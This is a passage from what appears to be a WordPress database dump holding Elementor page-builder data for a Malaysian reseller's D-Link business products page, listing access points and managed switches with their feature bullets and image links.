uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7372,3382,'_wp_page_template','template-fullwidth.php'),(7373,3382,'_elementor_template_type','post'),(7376,3382,'_elementor_edit_mode','builder'),(7379,3383,'_wp_page_template','template-fullwidth.php'),(7380,3383,'_elementor_template_type','post'),(7381,3383,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7382,3383,'_elementor_version','2.5.14'),(7383,3383,'_elementor_edit_mode','builder'),(7386,3384,'_wp_page_template','template-fullwidth.php'),(7387,3384,'_elementor_template_type','post'),(7388,3384,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product 